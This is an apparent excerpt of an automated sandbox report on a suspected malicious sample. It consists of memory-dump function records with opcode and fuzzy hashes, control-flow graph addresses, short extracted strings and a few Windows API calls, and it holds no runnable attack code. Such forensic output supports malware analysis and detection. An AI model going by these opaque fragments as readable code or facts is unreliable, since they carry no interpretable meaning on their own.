                                                                                              • API String ID:
                                                                                              • Opcode ID: d445935b167340828a7a53b0f0696144ed5be0713225ef9d3b1c3ac65e0958c3
                                                                                              • Instruction ID: 0816550aa573cb715430d542b91b9ac6f34b4ef47048f0a9f2a44d2864731b08
                                                                                              • Opcode Fuzzy Hash: d445935b167340828a7a53b0f0696144ed5be0713225ef9d3b1c3ac65e0958c3
                                                                                              • Instruction Fuzzy Hash: 94518E71D042488FEF14CFA6D8542DDBBB2BF89308FA0D06AC508AB256EB305955CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd43613a65cd6194931c3238e0dd199699a1880822d5720a1716de0e9e3929d0
                                                                                              • Instruction ID: 0e3d396e8aa08f864d9918a12b98afb63baa9a91c4ea67260d590c2b06273d35
                                                                                              • Opcode Fuzzy Hash: bd43613a65cd6194931c3238e0dd199699a1880822d5720a1716de0e9e3929d0
                                                                                              • Instruction Fuzzy Hash: 6A413F74D003188BEF14CFAAD85479DBBF2BF89348FA0D16AC518AB255EB345955CF10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfb7750bd1f3b143d7f7ae2073baa4cf6187bbf0727b44c6e1f6101cadc07cc0
                                                                                              • Instruction ID: 35b487fd671a8b035b3acfa2968ddaa472b494bb3ea2b387996949155ac1d7da
                                                                                              • Opcode Fuzzy Hash: dfb7750bd1f3b143d7f7ae2073baa4cf6187bbf0727b44c6e1f6101cadc07cc0
                                                                                              • Instruction Fuzzy Hash: 5E410770E002488FEF08CFAAD8546DEBBF2AF89304F60D06AC408BB259DB345946CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7949c8b8c7a1ffa84c00ecafcf94155e434254a5e9764621891938b84a5d83d5
                                                                                              • Instruction ID: ee964e9e382904da499af06df3d09c578e92edc7ebbb4cb847b0b2ffde5533e0
                                                                                              • Opcode Fuzzy Hash: 7949c8b8c7a1ffa84c00ecafcf94155e434254a5e9764621891938b84a5d83d5
                                                                                              • Instruction Fuzzy Hash: 8241F6B1D016589BEB18CFAAD8883CEBBF2BF88314F14C52AD418BB294DB750545CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7b843cf30bcbbf95509a9f5368cafdf1468acce86456d4bf13faedd64923f46c
                                                                                              • Instruction ID: 8f25524b32aef8a7b17e5f34b3d5ca5fdb647f7feb403c01603dc77512ababaa
                                                                                              • Opcode Fuzzy Hash: 7b843cf30bcbbf95509a9f5368cafdf1468acce86456d4bf13faedd64923f46c
                                                                                              • Instruction Fuzzy Hash: 9D4159B1E016188BEB58CF6BC95479EFAF3AFC9304F14C1BAC50CA6264DB740A858F55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 79a58d54373763c28f35f9bd0d65423dcf7f6a3402bbfebfd5855181c01f9556
                                                                                              • Instruction ID: b0647389f5c5ae906132552368671466efebd0a3ed5413764405aded77d8ba3b
                                                                                              • Opcode Fuzzy Hash: 79a58d54373763c28f35f9bd0d65423dcf7f6a3402bbfebfd5855181c01f9556
                                                                                              • Instruction Fuzzy Hash: 554105B4E002188BEB08CFAAD8546DDBBF2BF89300F60C16AC418BB354EB355946CF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa7409261db36b3d1008c7a315730712a2ecdb605fdfd6967d7f1151ef443b51
                                                                                              • Instruction ID: 523f9fd917b8b431760f2e04c1f4493e3a2522c658b0023a3929933cec69d025
                                                                                              • Opcode Fuzzy Hash: fa7409261db36b3d1008c7a315730712a2ecdb605fdfd6967d7f1151ef443b51
                                                                                              • Instruction Fuzzy Hash: D841C074D012488BEB18DFAAC85469EFBF2AF89300F64D13AD419BB264DB345946CF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc0195cfb663172005979eb35a4b9431803a626f0a414f44b8bf167ed8eda9b1
                                                                                              • Instruction ID: bc029aeade2d7044934d0014ef6e9a45e121caffd87f985fa9ba16848bd6918e
                                                                                              • Opcode Fuzzy Hash: dc0195cfb663172005979eb35a4b9431803a626f0a414f44b8bf167ed8eda9b1
                                                                                              • Instruction Fuzzy Hash: 79313574E052488BEB04CFBAC8446DEBBF2AF8A304F64C52AC418BB354EB345906CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fc1d40b56cf76e44a228902e50c7cf54a91ade857c03ac73808f68aa6b7512c5
                                                                                              • Instruction ID: e7c45c2dc646514ae8633cbd6de5e6d69737b367823fe78ed11b0008cece41cf
                                                                                              • Opcode Fuzzy Hash: fc1d40b56cf76e44a228902e50c7cf54a91ade857c03ac73808f68aa6b7512c5
                                                                                              • Instruction Fuzzy Hash: F531F274E052488BEB04CFBAC9406DEBBF2AFCA314F64D02AC418BB254EB345946CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eaa61df2cc51d383e1d3259d0bb01c2ed746c2cd3ef137298a5c443f6d750867
                                                                                              • Instruction ID: d4613795aa57bc9576f94f6e86e84d7d13f0a74a6aec56365c7a4718fc441042
                                                                                              • Opcode Fuzzy Hash: eaa61df2cc51d383e1d3259d0bb01c2ed746c2cd3ef137298a5c443f6d750867
                                                                                              • Instruction Fuzzy Hash: C431F174E012588BEB08CFEAD8546DEBBF2BF8A300F50D16AC418BB254DB345906CF55

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $S3$0 D3$0(D3$8!D3$LR^q$p-D3
                                                                                              • API String ID: 0-3114120276
                                                                                              • Opcode ID: b2c2c5da83f9f25abe6373e263c2a03d91f3605821e084da6afaf1461e0ecc91
                                                                                              • Instruction ID: 26648c896f834301b7dfd8d9bc83344861ce9eb24f45e00a19b7b3e054cb63eb
                                                                                              • Opcode Fuzzy Hash: b2c2c5da83f9f25abe6373e263c2a03d91f3605821e084da6afaf1461e0ecc91
                                                                                              • Instruction Fuzzy Hash: B352D874A00629CFDB54DF74DD94A9DBBB2FB49302F1085A9D409A7365EB306E82CF84

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 880 36553fe8-36553ff1 881 36553ff3-36553ff8 880->881 882 36553ffa-36553ffd 880->882 883 36554032-36554035 881->883 884 36554006-36554009 882->884 885 36553fff-36554004 882->885 886 36554012-36554015 884->886 887 3655400b-36554010 884->887 885->883 888 36554017-3655401c 886->888 889 3655401e-36554021 886->889 887->883 888->883 890 36554023-36554028 889->890 891 3655402a-3655402d 889->891 890->883 892 36554036-365540a6 891->892 893 3655402f 891->893 900 365540ab-365540ba call 36553f90 892->900 893->883 903 36554103-36554106 900->903 904 365540bc-365540d7 900->904 905 3655411c-3655414b 903->905 906 36554108-3655410e 903->906 904->903 917 365540d9-365540dd 904->917 911 36554157-3655415d 905->911 912 3655414d-36554150 905->912 906->900 907 36554110 906->907 909 36554112-36554119 907->909 915 36554171-365541a5 911->915 916 3655415f-36554162 911->916 912->911 914 36554152-36554155 912->914 914->911 918 365541a8-36554200 914->918 916->915 919 36554164-36554166 916->919 920 365540e6-365540ef 917->920 921 365540df-365540e4 917->921 926 36554207-36554287 918->926 919->915 922 36554168-3655416b 919->922 920->903 923 365540f1-365540fa 920->923 921->909 922->915 922->926 923->903 927 365540fc-36554101 923->927 945 365542a7-365542fd 926->945 946 36554289-3655428d 926->946 927->909 952 365542ff-36554306 945->952 953 36554308-36554311 945->953 983 36554290 call 36554385 946->983 984 36554290 call 36554351 946->984 985 36554290 call 36553fe8 946->985 986 36554290 call 36554088 946->986 947 36554293-365542a4 954 36554323-3655432c 952->954 955 36554313-3655431a 953->955 956 3655431c 953->956 957 365543c0-365543c7 call 365544d3 954->957 958 36554332-3655434f 954->958 955->954 956->954 960 365543cd-365543e9 957->960 958->960 963 365543f0-3655444a 960->963 964 365543eb-365543ee 960->964 965 36554452-3655445b 963->965 964->963 964->965 966 36554462-36554498 965->966 967 3655445d-36554460 965->967 969 365544c7-365544cd 966->969 978 3655449a-365544bf 966->978 967->966 967->969 978->969 983->947 984->947 985->947 986->947
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8cq$Hbq$Hbq$Hbq$TJcq
                                                                                              • API String ID: 0-1895975235
                                                                                              • Opcode ID: 55280fcd8a431be877a3b9d3e16ea23abacbdbc4f317023554ce15b938a51abc
                                                                                              • Instruction ID: add9d13c70db28c06b92a1a4b35cf14fec87564bf09eac590db05dd8bef3185b
                                                                                              • Opcode Fuzzy Hash: 55280fcd8a431be877a3b9d3e16ea23abacbdbc4f317023554ce15b938a51abc
                                                                                              • Instruction Fuzzy Hash: C6D1E634B042448FD704DB69C894A9E7BB2EF89321F254576E606EB3A1CF35DD42CBA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 988 36839968-368399ff GetCurrentProcess 993 36839a01-36839a07 988->993 994 36839a08-36839a3c GetCurrentThread 988->994 993->994 995 36839a45-36839a79 GetCurrentProcess 994->995 996 36839a3e-36839a44 994->996 998 36839a82-36839a9a 995->998 999 36839a7b-36839a81 995->999 996->995 1010 36839a9d call 36839f20 998->1010 1011 36839a9d call 36839b48 998->1011 999->998 1002 36839aa3-36839ad2 GetCurrentThreadId 1003 36839ad4-36839ada 1002->1003 1004 36839adb-36839b3d 1002->1004 1003->1004 1010->1002 1011->1002
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 368399EE
                                                                                              • GetCurrentThread.KERNEL32 ref: 36839A2B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 36839A68
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 36839AC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 20ef82537552f67f2b452a1206974d015bb5af6dea5fc86a4f468a7eb597bdcd
                                                                                              • Instruction ID: 76cccaeb42f3d497658989756aaa1f730f1d6e51e0f3fc4a26419093bfdd8b2d
                                                                                              • Opcode Fuzzy Hash: 20ef82537552f67f2b452a1206974d015bb5af6dea5fc86a4f468a7eb597bdcd
                                                                                              • Instruction Fuzzy Hash: 175164B0D013498FDB04DFAAC948BDEBBF1EB8C310F208519E109B7290DB749985CB65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1012 36839970-368399ff GetCurrentProcess 1016 36839a01-36839a07 1012->1016 1017 36839a08-36839a3c GetCurrentThread 1012->1017 1016->1017 1018 36839a45-36839a79 GetCurrentProcess 1017->1018 1019 36839a3e-36839a44 1017->1019 1021 36839a82-36839a9a 1018->1021 1022 36839a7b-36839a81 1018->1022 1019->1018 1033 36839a9d call 36839f20 1021->1033 1034 36839a9d call 36839b48 1021->1034 1022->1021 1025 36839aa3-36839ad2 GetCurrentThreadId 1026 36839ad4-36839ada 1025->1026 1027 36839adb-36839b3d 1025->1027 1026->1027 1033->1025 1034->1025
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 368399EE
                                                                                              • GetCurrentThread.KERNEL32 ref: 36839A2B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 36839A68
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 36839AC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 2bf0cc1141e3222786e4f755b831eecfbaeaf1f9b7c4bdb16b537328ccca9846
                                                                                              • Instruction ID: ae3faa075ebbaf6d00c98d4b6294a40922b70ce684cfbd39c948f62d42aca5c8
                                                                                              • Opcode Fuzzy Hash: 2bf0cc1141e3222786e4f755b831eecfbaeaf1f9b7c4bdb16b537328ccca9846
                                                                                              • Instruction Fuzzy Hash: 895163B4D003498FDB04DFAAC948BDEBBF1EB8C310F208519E109B7290DB749985CB65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1173 36553a50-36553a97 1177 36553c73-36553c7e 1173->1177 1178 36553a9d-36553a9f 1173->1178 1179 36553c85-36553c90 1177->1179 1178->1179 1180 36553aa5-36553aa9 1178->1180 1185 36553c97-36553ca2 1179->1185 1180->1179 1182 36553aaf-36553ae7 1180->1182 1182->1185 1193 36553aed-36553af1 1182->1193 1189 36553ca9-36553cb4 1185->1189 1194 36553cbb-36553ce7 1189->1194 1195 36553af3-36553af7 1193->1195 1196 36553afd-36553b01 1193->1196 1228 36553cee-36553d1a 1194->1228 1195->1189 1195->1196 1198 36553b03-36553b0a 1196->1198 1199 36553b0c-36553b10 1196->1199 1200 36553b28-36553b2c 1198->1200 1199->1200 1201 36553b12-36553b16 1199->1201 1205 36553b33-36553b3a 1200->1205 1206 36553b2e-36553b30 1200->1206 1203 36553b21 1201->1203 1204 36553b18-36553b1f 1201->1204 1203->1200 1204->1200 1207 36553b43-36553b47 1205->1207 1208 36553b3c 1205->1208 1206->1205 1213 36553c26-36553c29 1207->1213 1214 36553b4d-36553b51 1207->1214 1208->1207 1209 36553bc5-36553bc8 1208->1209 1210 36553b96-36553b99 1208->1210 1211 36553c61-36553c6c 1208->1211 1212 36553bf8-36553bfb 1208->1212 1219 36553bd3-36553bf6 1209->1219 1220 36553bca-36553bcd 1209->1220 1223 36553ba4-36553bc3 1210->1223 1224 36553b9b-36553b9e 1210->1224 1211->1177 1221 36553c02-36553c21 1212->1221 1222 36553bfd 1212->1222 1216 36553c39-36553c5c 1213->1216 1217 36553c2b-36553c2e 1213->1217 1214->1211 1218 36553b57-36553b5a 1214->1218 1243 36553b7f-36553b83 1216->1243 1217->1216 1225 36553c30-36553c33 1217->1225 1226 36553b61-36553b7d 1218->1226 1227 36553b5c 1218->1227 1219->1243 1220->1219 1220->1228 1221->1243 1222->1221 1223->1243 1224->1194 1224->1223 1225->1216 1233 36553d21-36553d5d 1225->1233 1226->1243 1227->1226 1228->1233 1253 36553b86 call 36553fe8 1243->1253 1254 36553b86 call 36554088 1243->1254 1247 36553b8c-36553b93 1253->1247 1254->1247
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $Hbq$Hbq$Hbq
                                                                                              • API String ID: 0-580995494
                                                                                              • Opcode ID: 47951d904eaa6384d9055fb9de7b9e8f21898033b225ed73cd3ba355fb77567c
                                                                                              • Instruction ID: 530de9b7bc21648c1b601c8bca60025dbed986eb9765c012b352521bfdee528c
                                                                                              • Opcode Fuzzy Hash: 47951d904eaa6384d9055fb9de7b9e8f21898033b225ed73cd3ba355fb77567c
                                                                                              • Instruction Fuzzy Hash: 13810434B006149BEF15AF78D81826D3AA2AFD5360F61463AF61B973D1EF348D42CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2322 165f38-165f5a 2323 165f70-165f7b 2322->2323 2324 165f5c-165f60 2322->2324 2325 166023-16604f 2323->2325 2326 165f81-165f83 2323->2326 2327 165f62-165f6e 2324->2327 2328 165f88-165f8f 2324->2328 2334 166056-1660ae 2325->2334 2329 16601b-166020 2326->2329 2327->2323 2327->2328 2330 165f91-165f98 2328->2330 2331 165faf-165fb8 2328->2331 2330->2331 2332 165f9a-165fa5 2330->2332 2401 165fba call 367ee588 2331->2401 2402 165fba call 165f38 2331->2402 2332->2334 2335 165fab-165fad 2332->2335 2354 1660b0-1660b6 2334->2354 2355 1660bd-1660cf 2334->2355 2335->2329 2336 165fc0-165fc2 2337 165fc4-165fc8 2336->2337 2338 165fca-165fd2 2336->2338 2337->2338 2341 165fe5-166004 2337->2341 2342 165fd4-165fd9 2338->2342 2343 165fe1-165fe3 2338->2343 2347 166006-166011 call 16afad 2341->2347 2348 166019 2341->2348 2342->2343 2343->2329 2351 166017 2347->2351 2348->2329 2351->2329 2354->2355 2357 1660d5-1660d9 2355->2357 2358 166163-166165 2355->2358 2359 1660db-1660e7 2357->2359 2360 1660e9-1660f6 2357->2360 2407 166167 call 1662f0 2358->2407 2408 166167 call 166300 2358->2408 2366 1660f8-166102 2359->2366 2360->2366 2361 16616d-166173 2364 166175-16617b 2361->2364 2365 16617f-166186 2361->2365 2367 1661e1-16622f 2364->2367 2368 16617d 2364->2368 2371 166104-166113 2366->2371 2372 16612f-166133 2366->2372 2403 166231 call 367eeb58 2367->2403 2404 166231 call 367eebe3 2367->2404 2405 166231 call 367ee950 2367->2405 2406 166231 call 367ee941 2367->2406 2368->2365 2383 166115-16611c 2371->2383 2384 166123-16612d 2371->2384 2373 166135-16613b 2372->2373 2374 16613f-166143 2372->2374 2376 16613d 2373->2376 2377 166189-1661da 2373->2377 2374->2365 2378 166145-166149 2374->2378 2376->2365 2377->2367 2380 166247-16625e 2378->2380 2381 16614f-166161 2378->2381 2381->2365 2383->2384 2384->2372 2396 166237-166240 2396->2380 2401->2336 2402->2336 2403->2396 2404->2396 2405->2396 2406->2396 2407->2361 2408->2361
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hbq$Hbq
                                                                                              • API String ID: 0-4258043069
                                                                                              • Opcode ID: 0e7b64d8df426995e5ea54f1d2810caed8b669526f5eeffb044aab6b03a45665
                                                                                              • Instruction ID: 16fe42ed1004caefd0b126219276578c73b6030dffc40b141bb420e765d45241
                                                                                              • Opcode Fuzzy Hash: 0e7b64d8df426995e5ea54f1d2810caed8b669526f5eeffb044aab6b03a45665
                                                                                              • Instruction Fuzzy Hash: B691AB303042548FDB199F78CC94A6A7BE2BFC9300F148469E9468B3A2CF38CD52DB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2410 367ee950-367ee963 2412 367ee96c-367ee980 2410->2412 2413 367ee965-367ee967 2410->2413 2416 367ee986 2412->2416 2417 367ee982-367ee984 2412->2417 2414 367ee9f0-367ee9f3 2413->2414 2418 367ee989-367ee98e 2416->2418 2417->2418 2419 367ee995-367ee9af 2418->2419 2422 367ee9f4-367eea27 2419->2422 2423 367ee9b1-367ee9e7 2419->2423 2428 367eea29-367eea2b 2422->2428 2429 367eea30-367eea57 2422->2429 2423->2419 2437 367ee9e9 2423->2437 2430 367eeb34-367eeb3b 2428->2430 2438 367eea8e-367eea90 2429->2438 2439 367eea59-367eea6f 2429->2439 2437->2414 2440 367eea99-367eeaad 2438->2440 2441 367eea92-367eea94 2438->2441 2439->2438 2448 367eea71-367eea88 2439->2448 2444 367eeaaf-367eeab1 2440->2444 2445 367eeab3 2440->2445 2441->2430 2447 367eeab6-367eead3 2444->2447 2445->2447 2453 367eeb3c 2447->2453 2454 367eead5-367eead8 2447->2454 2448->2438 2448->2453 2458 367eeb41-367eeb77 call 367eebe3 2453->2458 2454->2453 2455 367eeada-367eeade 2454->2455 2456 367eeb20-367eeb2d 2455->2456 2457 367eeae0-367eeae6 2455->2457 2456->2430 2459 367eeae9-367eeaf1 2457->2459 2466 367eeb7d-367eebca 2458->2466 2459->2458 2461 367eeaf3-367eeb09 call 367ee700 2459->2461 2468 367eeb0b-367eeb0d 2461->2468 2469 367eeb17-367eeb1a 2461->2469 2476 367eebcc-367eebcf 2466->2476 2477 367eebd1 2466->2477 2468->2469 2469->2453 2471 367eeb1c-367eeb1e 2469->2471 2471->2456 2471->2459 2478 367eebd4-367eebd9 2476->2478 2477->2478
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LR^q$LR^q
                                                                                              • API String ID: 0-4089051495
                                                                                              • Opcode ID: 4cbccb3d930f91e9dce937738d1098c1d4ce2f918b36391b8635722e218f81bf
                                                                                              • Instruction ID: bc107516f0ec761f0e9531dd9fdb7773490bb7a72a1f6fb5855887af27b45509
                                                                                              • Opcode Fuzzy Hash: 4cbccb3d930f91e9dce937738d1098c1d4ce2f918b36391b8635722e218f81bf
                                                                                              • Instruction Fuzzy Hash: 8581CE34B202018FDB04DF79C854A6E7BF6BF89644B5185A9E506DF3A2DB30DC06CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 11abc1451ae3e32104fd0e68ee24ac9336727c2c0d022fb9fbb582f4a36b5f91
                                                                                              • Instruction ID: d2ddfd0cec7aa39f96bfdff2e3c7cda766ff8f0cd7b777f27835dbeaaf0fc23d
                                                                                              • Opcode Fuzzy Hash: 11abc1451ae3e32104fd0e68ee24ac9336727c2c0d022fb9fbb582f4a36b5f91
                                                                                              • Instruction Fuzzy Hash: 1F519F307002459FDB04DFA9CC84B6ABBEAEF89354F14846AE909CB365DB71DC51CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Xbq$Xbq
                                                                                              • API String ID: 0-1243427068
                                                                                              • Opcode ID: 962fa09006bf80a505eec11d2248e9355c253f9c0c27807801d7e13b7868ff7e
                                                                                              • Instruction ID: a1acddc6a358bb94142ecee811531e62c3c38a7ccce795ae6ee77a3c69f260bb
                                                                                              • Opcode Fuzzy Hash: 962fa09006bf80a505eec11d2248e9355c253f9c0c27807801d7e13b7868ff7e
                                                                                              • Instruction Fuzzy Hash: 0F310431B0422887DF1C4ABA8C9427EA5EAABC4311F68443EE826D3390DF74CE5197A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q
                                                                                              • API String ID: 0-355816377
                                                                                              • Opcode ID: bc35dc67d0422ba4b5e12498cf2eb4bdb8a3c97c814f933ae9b1837f9f27e5e8
                                                                                              • Instruction ID: 420a97b85147f5133b7212044bd6662e187879ac7f9667c1530dfe1ef1952c62
                                                                                              • Opcode Fuzzy Hash: bc35dc67d0422ba4b5e12498cf2eb4bdb8a3c97c814f933ae9b1837f9f27e5e8
                                                                                              • Instruction Fuzzy Hash: B93181303041118FCB298B3DDC9453E7BAABB85711B254AAAF446CB692DF24DC908795
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8cq$TJcq
                                                                                              • API String ID: 0-1920894394
                                                                                              • Opcode ID: 4d56cc2a94acb03b0107e7a4d801eafba58ba588fa82a3f2430673bbb4bceaa1
                                                                                              • Instruction ID: a52631cae71f7ff1af1ff2127be18584eadc8cd62062f66d86e5a0d9cc92f0e9
                                                                                              • Opcode Fuzzy Hash: 4d56cc2a94acb03b0107e7a4d801eafba58ba588fa82a3f2430673bbb4bceaa1
                                                                                              • Instruction Fuzzy Hash: 96311575B002188FCB04DFA9C480E9DBBB2AF88321F195591E505AB361DB30EC86CFA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8cq$TJcq
                                                                                              • API String ID: 0-1920894394
                                                                                              • Opcode ID: 9745dae9ac4d60abbcd173231eb33346d9c566ba98b3b91296c7e27a9317fcb6
                                                                                              • Instruction ID: 9a0eb3e527d65a6c425bc9a5a0b7aec4661f8b883be031a9f6bbfa02fae22eb8
                                                                                              • Opcode Fuzzy Hash: 9745dae9ac4d60abbcd173231eb33346d9c566ba98b3b91296c7e27a9317fcb6
